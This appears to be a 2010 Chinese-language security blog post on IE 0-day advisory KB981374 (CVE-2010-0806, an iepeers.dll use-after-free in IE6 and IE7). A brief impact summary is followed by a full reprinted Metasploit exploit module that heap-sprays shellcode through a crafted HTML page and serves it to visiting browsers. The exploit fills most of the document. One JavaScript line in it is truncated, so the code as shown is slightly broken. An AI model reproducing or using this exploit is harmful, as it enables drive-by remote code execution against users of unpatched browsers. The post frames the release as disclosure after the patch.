發表時間:2010-3-10
kb981374橙色預警
IE瀏覽器再現新0day漏洞,該漏洞可能允許遠程執行代碼,***利用該漏洞可以製造一個特別的頁面,再通過電子郵件、IM消息或其它欺騙的方式,誘使用 戶訪問這個特殊的頁面而觸發。
一 漏洞發展:
2010.3.10 微軟發佈安全公告kb981374,並表示要發佈額外補丁修復該漏洞(通常情況下,微軟只有特別嚴重的安全漏洞纔會啓動額外補丁發佈流程。)
二、漏洞簡述:
此IE新漏洞存在於iepeers.dll組件中,影響IE6/ie7 該漏洞已經在地下黑市交易,IE8不會受此漏洞影響。
三、漏洞影響:
1 主要影響用戶:
xp ie6/ie7用戶
2 可能受影響用戶
vista ie7保護模式減少影響
win2003 ie7受限模式可以減少影響
3 不受影響用戶
IE8用戶
win2000 ie5用戶
代碼:
# Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
# EDB-ID: 11683
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Trancer
# Published: 2010-03-10
# Verified: yes
# Download Exploit Code
# Download N/A
view sourceprint?##
# ie_iepeers_pointer.rb
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
# Trancer
# http://www.rec-sec.com
##
require ''msf/core''
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
''Name'' => ''Microsoft Internet Explorer iepeers.dll use-after-free'',
''Description'' => %q{
This module exploits a use-after-free vulnerability within iepeers.dll of
Microsoft Internet Explorer versions 6 and 7.
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
''License'' => MSF_LICENSE,
''Author'' => [
''Trancer <mtrancer[at]gmail.com>''
],
''Version'' => ''$Revision:$'',
''References'' =>
[
[ ''CVE'', ''2010-0806'' ],
[ ''OSVDB'', ''62810'' ],
[ ''BID'', ''38615'' ],
[ ''URL'', ''http://www.microsoft.com/technet/security/advisory/981374.mspx'' ],
[ ''URL'', ''http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day
-attack-announced-cve-2010-0806/'' ]
],
''DefaultOptions'' =>
{
''EXITFUNC'' => ''process'',
''InitialAutoRunScript'' => ''migrate -f'',
},
''Payload'' =>
{
''Space'' => 1024,
''BadChars'' => "\x00\x09\x0a\x0d''\\",
''StackAdjustment'' => -3500,
},
''Platform'' => ''win'',
''Targets'' =>
[
[ ''Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0'', { ''Ret'' => 0x0C0C0C0C } ]
],
''DisclosureDate'' => ''Mar 09 2010'',
''DefaultTarget'' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack(''V''))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Build out the message
html = %Q|<html><body>
<button id=''#{j_id}'' style=''display:none''></button>
<script language=''javascript''>
function #{j_function1}(){
var #{j_shellcode} = unescape(''#{shellcode}'');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape(''#{ret}'');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement(''body'');
#{j_object}.addBehavior(''#default#userData'');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute(''s'',window);
}
} catch(e){ }
window.status+='''';
}
document.getElementById(''#{j_id}'').
</script></body></html>|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, html, { ''Content-Type'' => ''text/html'' })
# Handle the payload
handler(cli)
end
end
PS:放出代碼的原因就是補丁已發佈,請大家及時打上否則你就慘了!
友情提示:該代碼具有危險性慎用!
鄭重聲明:本人提供BUG資料僅做學術交流之用,不承擔任何因此而引發的一系列法律責任,望周知!